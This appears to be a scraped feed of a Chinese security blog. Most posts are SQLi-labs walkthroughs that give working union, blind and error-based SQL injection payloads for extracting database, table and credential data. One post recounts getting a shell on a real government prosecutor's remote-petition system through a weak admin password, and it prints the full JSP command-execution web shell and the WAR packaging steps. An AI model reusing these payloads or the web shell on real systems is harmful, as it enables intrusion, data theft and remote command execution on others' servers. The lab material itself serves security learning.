Fre3L3i's blogs Fre3L3i's Blog 2019-12-05T11:11:12.953Z http://fre3l3i.github.io/ Fre3L3i Hexo sql-lib每日一记_Less5(day5) http://fre3l3i.github.io/2019/12/05/sql-lib每日一记-Less5-day5/ 2019-12-05T10:34:14.000Z 2019-12-05T11:11:12.953Z SQL-Lib_Less5

查看源代码

​ 首先分析可以看到这里以单引号闭合,如果有查询出来的值返回you are in ….,否则如果语句错误,或sql连接有误,会把错误输出出来,并且输出一个

用意

** 这道题想告诉我们的是当查询正确的时候他会返回you are in …. 而当错误或异常的时候他只会返回空或是错误语句**,那如果不理解可以理解为you are in….(代表了True)**,而返回为空则代表了(False)**

尝试正常访问**和非正常访问**

http://192.168.72.179/sqli-labs/Less-5/?id=1

http://192.168.72.179/sqli-labs/Less-5/?id=1'

可以明显看到有错误返回**,可以判断语句是可以被执行的,并且没有加过滤**

首先我们先查询一下版本**,测试一下我们是否能用盲注的方式获得数据**

  • ​ 利用left(database(),1)进行尝试

  • ​ 下面是LEFT()函数的语法

  • ​ LEFT(str,length);

  • ​ LEFT()函数接受两个参数:

  • str是要提取子字符串的字符串。

  • length是一个正整数,指定将从左边返回的字符数。

LEFT()报道查看函数str字符串中最左边的长度字符。如果str或length参数为NULL,报道查看则NULL值。

如果length为0或为负,则LEFT函数报道查看一个空字符串。如果length大于str字符串的长度,则LEFT函数报道查看整个str字符串。

请注意,SUBSTRING(或SUBSTR)函数也提供与LEFT函数相同的功能。

SELECT LEFT(‘MySQL LEFT’, 5);

在这里在注释后面的语句的时候突然发现了一个问题

​ 正常来说#应该是可以注释掉的但是在环境中输入#并没有把后面的语句注释掉,报错任然显示,直到我把#用urlencode编码了之后换成%23才能成功执行语句

http://192.168.72.179/sqli-labs/Less-5/?id=1'and left(version(),1)=5#

http://192.168.72.179/sqli-labs/Less-5/?id=1'and left(version(),1)=5%23

当然在这里也可以用**–+进行注释,让mysql语句后面不执行**

那么回过主题,我们这里的数据库版本是**5.1.41的**

那么我们来看会下如果值不等于5会返回什么呢

可以看到数据库查询是正确的**,但是猜的值不对,所以我们的返回为空**

于是我们可以一点点猜测过去

http://192.168.72.179/sqli-labs/Less-5/?id=1'and left(version(),1)=5–+

可是知道猜到第四个值,sql语句报错了

http://192.168.72.179/sqli-labs/Less-5/?id=1'and left(version(),4)=5.1.%23

在mysql命令行中是这样报错的

大家可以在我的博客底下评论一起探讨这个问题哦

爆破数据库第一位

http://192.168.72.179/sqli-labs/Less-5/?id=1'and left(database(),1)>’a’–+

Database()为security,所以我们看他的第一位是否> a,很明显的是s > a,因此返回正确。当我们不知情的情况下,可以用二分法来提高注入的效率。

猜测数据库第二位

得知第一位为s,我们看前两位是否大于sa

http://192.168.72.179/sqli-labs/Less-5/?id=1'and left(database(),2)>’sa’–+

然后剩下的6个字符以此类推

substr()函数 ascii()函数 limit()函数讲解**

substr()**函数**

​ 语法:substr(str,pos,len);//str:字符串,pos:起始位置,len:截断长度

​ 例子:SELECT SUBSTR(‘2018-08-17’,6,7);

ASCII()函数

​ 返回字符串str的最左面字符的ASCII代码值。如果str是空字符串,返回0。如果str是NULL,返回NULL

举例:select ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1));

limit()函数

limit子句用于限制查询结果返回的数量,常用于分页查询

举例:select table_name from information_schema.tables where table_schema=”security” limit 0,1;

select table_name from information_schema.tables where table_schema=”security” limit 1,1;

利用**substr() ascii()**函数进行尝试

http://192.168.72.179/sqli-labs/Less-5/?id=1'and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>80–

http://192.168.72.179/sqli-labs/Less-5/?id=1%27and+ascii(substr((select+table_name+from+information_schema.tables+where+table_schema%3ddatabase()+limit+0%2c1)%2c1%2c1))%3e80--+](http://192.168.72.179/sqli-labs/Less-5/?id=1'and+ascii(substr((select+table_name+from+information_schema.tables+where+table_schema%3ddatabase()+limit+0%2c1)%2c1%2c1))>80--+)

此处table_schema 可以写成=’security’,但是我们这里使用的database(),是因

为此处database()就是security。此处同样的使用二分法进行测试,直到测试正确为止。

此处应该是101,因为第一个表示email。

这里我们已经了解了substr()函数,这里使用substr(**,2,1)即可。

http://192.168.72.179/sqli-labs/Less-5/?id=1'and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),2,1))>80–

http://192.168.72.179/sqli-labs/Less-5/?id=1%27and+ascii(substr((select+table_name+from+information_schema.tables+where+table_schema%3ddatabase()+limit+0%2c1)%2c2%2c1))%3e80–+

regexp() 函数

MySQL 中使用 REGEXP 关键字指定正则表达式的字符匹配模式,下表列出了 REGEXP 操作符中常用的匹配列表。

举例:select * from users where username REGEXP ‘^a’;

利用**regexp** 获取**securityusers** 表中的列

http://192.168.72.179/sqli-labs/Less-5/?id=1' and 1=(select 1 from information_sch

ema.columns where table_name=’users’ and table_name regexp ‘^us[a-z]’ limit 0,1)–

[http://192.168.72.179/sqli-labs/Less-5/?id=1%27%20and%201=(select%201%20from%20information_schema.columns%20where%20table_name=%27users%27%20and%20table_name%20regexp%20%27^us[a-z\]%27%20limit%200,1)--+](http://192.168.72.179/sqli-labs/Less-5/?id=1' and 1=(select 1 from information_schema.columns where table_name=’users’ and table_name regexp ‘^us[a-z]’ limit 0,1)–+)

上述语句时选择users 表中的列名是否有us**的列

http://127.0.0.1/sqllib/Less-5/?id=1' and 1=(select 1 from information_schema.columns where

table_name=’users’ and column_name regexp ‘^username’ limit 0,1)–+

http://192.168.72.179/sqli-labs/Less-5/?id=1%27+and+1%3d(select+1+from+information_schema.columns+where+table_name%3d%27users%27+and+column_name+regexp+%27%5eusername%27+limit+0%2c1)–+

上图中可以看到username 存在。我们可以将username 换成password 等其他的项也是正确

的。

ORD()函数** MID()函数 IFNULL()函数 CAST()函数 讲解**

ORD() 函数

ORD() 函数返回字符串第一个字符的 ASCII 值。

语法: ORD(string)

例子: select ord(‘I’);

MID()函数

SQL MID() 函数用于得到一个字符串的一部分。这个函数被MySQL支持,但不被MS SQL Server和Oracle支持。在SQL Server, Oracle 数据库中,我们可以使用 SQL SUBSTRING函数或者 SQL SUBSTR函数作为替代。

MID() 函数语法为:SELECT MID(ColumnName, Start [, Length]) FROM TableName

举例: select mid(‘fre3l3i’,1,5);

IFNULL() 函数

IFNULL() 函数用于判断第一个表达式是否为 NULL,如果为 NULL 则返回第二个参数的值,如果不为 NULL 则返回第一个参数的值。

IFNULL() 函数**语法为**:IFNULL(expression, alt_value)

举例:SELECT IFNULL(NULL, “RUNOOB”);

CAST()函数****

CAST用来转换字符类型

语法:CAST( value AS type )

type的类型有

value描述
DATE日期,格式为 ‘YYYY-MM-DD’.
DATETIME日期加具体的时间,格式为 ‘YYYY-MM-DD HH:MM:SS’.
TIME时间,格式为 ‘HH:MM:SS’.
CHAR字符型
SIGNEDint
UNSIGNED无符号int
BINARY二进制型
DECIMALfloat型

举例**:**select cast(20.3456 as decimal(10, 2)) as num ;

select cast(‘2019-03-08 15:31:26’ as datetime ) as date;

利用ord()和mid()数获取users 表的内容**

获取users 表中的内容。获取username 中的第一行的第一个字符的ascii,与68 进行比较,

即为D。而我们从表中得知第一行的数据为Dumb。所以接下来只需要重复造轮子即可。

报错注入

Concat()函数

语法:concat(str1, str2,…)

作用:将多个字符串连接成一个字符串。

举例:select concat(id,username,password) as info from users;

Floor()函数

语法**:floor**(x)

作用**:返回小于或等于x的最大整数**

举例:**select floor(1.5)**

http://127.0.0.1/sqllib/Less-5/?id=1' union Select 1,count(*),concat(0x3a,0x3a,(select user()),0

x3a,0x3a,floor(rand(0)*2))a from information_schema.columns group by a–+

利用double 数值类型超出范围进行报错注入,没有试验成功,主要由于函数溢出了之后返回为Null

每天一更 有点吃不消,这篇文章还没有结束,真的才发现,原来到了大学,时间真的没有那么的充分,希望大家能够好好珍惜时间。明天继续写,未完待续……

]]> <h2 id="SQL-Lib-Less5"><a href="#SQL-Lib-Less5" class="headerlink" title="SQL-Lib_Less5"></a><strong>SQL-Lib_Less5</strong></h2><h3 id="查看源代 sql-lib每日一记_Less4(day4) http://fre3l3i.github.io/2019/12/03/sql-lib每日一记-Less4-day4/ 2019-12-03T03:44:07.000Z 2019-12-05T11:11:13.903Z SQL-Lib_Less4

查看代码 双引号括号闭合

​ 可以看到在传入id值的时候用了 . 拼接了 “

​ 首先让他报错,查看报错的语句用什么闭合的

测试如何闭合可以不报错

找到闭合方法后,开始测字段,检测出当前表中有三个字段

使用联合查询找到三个字段所输出的位置

首先爆破数据库

http://192.168.72.179/sqli-labs/Less-4/?id=-1%22)%20union%20select%201,2,database()–+ union select 1,2,database()–+)

爆破security数据库的表

http://192.168.72.179/sqli-labs/Less-4/?id=-1") union select 1,2,group_concat(table_name ) from information_schema.tables where table_schema=”security”–+

爆破users表中的字段

http://192.168.72.179/sqli-labs/Less-4/?id=-1") union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=”security” and table_name=”users”–+

直接提取数据

http://192.168.72.179/sqli-labs/Less-4/?id=-1") union select 1,username,password from users where id=2–+

]]> <h2 id="SQL-Lib-Less4"><a href="#SQL-Lib-Less4" class="headerlink" title="SQL-Lib_Less4"></a>SQL-Lib_Less4</h2><h3 id="查看代码-双引号括号闭合"><a href sql-lib每日一记_Less3(day3) http://fre3l3i.github.io/2019/11/29/sql-lib每日一记-Less3-day3/ 2019-11-29T06:47:51.000Z 2019-12-05T11:11:02.169Z SQL-Lib_Less3

查看代码

  • 可以看到使用的是括号闭合

  • 用 ) 闭合:?id=1′) –-+

爆破字段长度

联合查询找到字段输出的位置

爆破数据库,找到security数据库

查询数据库中的表

查询security数据库中的users表中的字段

查询数据

]]> <h2 id="SQL-Lib-Less3"><a href="#SQL-Lib-Less3" class="headerlink" title="SQL-Lib_Less3"></a>SQL-Lib_Less3</h2><h3 id="查看代码"><a href="#查看代码" sql-lib每日一记_Less2(day2) http://fre3l3i.github.io/2019/11/28/sql-lib每日一记-Less2-day2/ 2019-11-28T13:41:45.000Z 2019-11-29T06:51:45.971Z SQL-Lib_Less2

  • 爆破security数据库表

  • 爆破users表中的字段

    • 提取字段中的username和password内容

]]> <h2 id="SQL-Lib-Less2"><a href="#SQL-Lib-Less2" class="headerlink" title="SQL-Lib_Less2"></a>SQL-Lib_Less2</h2><ul> <li><h3 id="查看源代码"><a hr sql-lib每日一记_Less1(day1) http://fre3l3i.github.io/2019/11/27/sql-lib每日一记-Less1-day1/ 2019-11-27T08:57:16.000Z 2019-11-28T16:16:38.492Z SQL-Lib_Less1

  • 查看源代码

本地环境试验访问地址:http://192.168.72.179/sqli-labs/Less-1/?id=1

  • 查询语句
  • 从上述错误当中,我们可以看到提交到sql 中的1’在经过sql 语句构造后形成’1’’ LIMIT 0,1,
  • 多加了一个’ 。这种方式就是从错误信息中得到我们所需要的信息,那我们接下来想如何
  • 将多余的‘ 去掉呢?
  • 尝试‘or 1=1–+
  • 此时构造的sql 语句就成了
  • Select ** where id=’1’or 1=1–+’ LIMIT 0,1

http://192.168.72.179/sqli-labs/Less-1/?id=1' or 1=1 –+

  • 可以看到正常返回数据。
  • 此处可以利用order by。Order by 对前面的数据进行排序,这里有三列数据,我们就只能用
  • order by 3,超过3 就会报错。
  • ‘order by 4–+的结果显示结果超出。

Order by 作用

  • ORDER BY 语句
  • ORDER BY 语句用于根据指定的列对结果集进行排序。
  • ORDER BY 语句默认按照升序对记录进行排序。
  • 如果您希望按照降序对记录进行排序,可以使用 DESC 关键字。

实例

  • 三个查询分别以id,username,password三个字段正序排列,当查到4的时候发现没有第四个字段

最后从源代码中分析下为什么会造成注入?

  • Sql 语句为$sql=”SELECT * FROM users WHERE id=’$id’ LIMIT 0,1”;
  • Id 参数在拼接sql 语句时,未对id 进行任何的过滤等操作,所以当提交‘or 1=1–+,直接构
  • 造的sql 语句就是
  • SELECT * FROM users WHERE id=’1’or 1=1–+ LIMIT 0,1
  • 这条语句因or 1=1 所以为永恒真。
  • 此处介绍union 联合注入,union 的作用是将两个sql 语句进行联合。Union 可以从
  • 下面的例子中可以看出,强调一点:union 前后的两个sql 语句的选择列数要相同才可以。
  • nion all 与union 的区别是增加了去重的功能。我们这里根据上述background 的知识,进行
  • information_schema 知识的应用。
  • 当id 的数据在数据库中不存在时,(此时我们可以id=-1,两个sql 语句进行联合操作时,
  • 当前一个语句选择的内容为空,我们这里就将后面的语句的内容显示出来)此处前台页面返
  • 回了我们构造的union 的数据。

爆数据库

  • http://192.168.72.179/sqli-labs/Less-1/?id=-1' union select 1,2,group_concat(schema_name) from information_schema.schemata –+
  • 此时的sql 语句为SELECT * FROM users WHERE id=’-1’union select 1,group_concat(schema
  • _name),3 from information_schema.schemata–+ LIMIT 0,1

  • 可以看到id,username 分别被1,2站位站掉了,而password读取的内容则为information_schema这个数据库下面的schemata这张表里面的schema_name 这个字段,schema_name这个字段里面存储着mysql中所有的数据库。

爆security数据库的数据表

  • http://192.168.72.179/sqli-labs/Less-1/?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=”security”–+
  • 此时的sql 语句为SELECT * FROM users WHERE id=’-1’union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=’security’–+ LIMIT 0,1

爆users表的列(字段名)

http://192.168.72.179/sqli-labs/Less-1/?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema = ‘security’ and table_name =’users’ –+

  • 此时的sql 语句为
  • SELECT * FROM users WHERE id=’-1’union select 1,2,group_concat(column_name) from information_schema.columns where table_schema = ‘security’ and table_name =’users’ –+ LIMIT 0,1

爆数据

  • 此时的sql 语句为SELECT * FROM users WHERE id=’-1’union select 1,username,password from users where id=2–+ LIMIT 0,1

]]> <h2 id="SQL-Lib-Less1"><a href="#SQL-Lib-Less1" class="headerlink" title="SQL-Lib_Less1"></a>SQL-Lib_Less1</h2><ul> <li><h3 id="查看源代码"><a hr 记zf实战后提交cnvd后续 http://fre3l3i.github.io/2019/10/06/记zf实战后提交cnvd后续/ 2019-10-06T05:51:48.000Z 2019-11-27T10:46:16.611Z 归档编号 CNVD-2019-31770

记录一下漏洞归档时间线

  • 一级审核 (2019-09-16 14:43:17) 审核通过
  • 二级审核 (2019-09-16 15:46:33) 审核通过
  • 三级审核 (2019-09-17 15:52:30) 审核通过

  • 基本上三天内就过了审核

  • 审核过完之后能看到自己漏洞的评分 (评分规则按照CVSS 2.0标准评判)

  • 之后漏洞归档 (2019-09-17 15:52:30)

  • 归档完毕后会漏洞验证(2019-09-17 17:39:56) 【这里需要的时间长一点 目测需要几周时间】

  • 最后透露一下(预计下一篇文章放出批量次漏洞的POC哦~)

]]> <h2 id="归档编号-CNVD-2019-31770"><a href="#归档编号-CNVD-2019-31770" class="headerlink" title="归档编号 CNVD-2019-31770"></a>归档编号 CNVD-2019-31770</h2>< 记一次zf的实战😀 http://fre3l3i.github.io/2019/09/16/记一次zf站的实战😀/ 2019-09-16T04:19:29.911Z 2019-09-16T05:46:48.479Z 记一次zf的实战😀

记一次某人民检察院远程接访系统漏洞后台getshell

  • 找到后台管理控制台后(尝试用弱口令进入)

  • 弱口令登录后

  • 找到发布应用程序

  • 准备jsp shell 并保存为zpojerjv.jsp

<%@ page import="java.util.*,java.io.*"%>
<%
%>
<HTML><BODY>
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<%
if (request.getParameter("cmd") != null) {
out.println("Command: " + request.getParameter("cmd") + "<BR>");
Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String disr = dis.readLine();
while ( disr != null ) {
out.println(disr); 
disr = dis.readLine(); 
}
}
%>
</pre>
</BODY></HTML>

  • 准备WEB-INF中的xml文件用来解析jsp木马(把xml文件命名为web.xml并放入WEB-INF文件夹中)

<?xml version="1.0"?>
<!DOCTYPE web-app PUBLIC
"-//Sun Microsystems, Inc.//DTD Web Application 2.3//EN"
"http://java.sun.com/dtd/web-app_2_3.dtd">
<web-app>
<welcome-file-list>
<welcome-file>zpojerjv.jsp</welcome-file>
</welcome-file-list>
</web-app>

  • 如下图桌面上的一个文件夹一个文件

  • 完成后将两个文件打包成zip格式

  • 打包操作如下所示

  • 成功后如下所示,在桌面中会出现shell.zip的压缩包

  • 把压缩包改名为war格式后缀

  • 修改好后上传至发布应用程序

  • 上传成功后能看到下图消息

  • 点击应用程序列表发现shell.war状态已启动

  • 最后点击访问

  • 输入命令whoami 能获取到的权限为root权限

  • 漏洞利用完毕,此服务器可做内网穿透,漏洞危害较大,已提交至CNVD望厂商重视。

]]> <h1 id="记一次zf的实战😀"><a href="#记一次zf的实战😀" class="headerlink" title="记一次zf的实战😀"></a>记一次zf的实战😀</h1><h3 id="记一次某人民检察院远程接访系统漏洞后台getshell"><a h Hello World http://fre3l3i.github.io/2019/09/13/hello-world/ 2019-09-13T07:34:31.218Z 2019-09-16T04:26:02.743Z
]]> 此文章需要密码才能访问。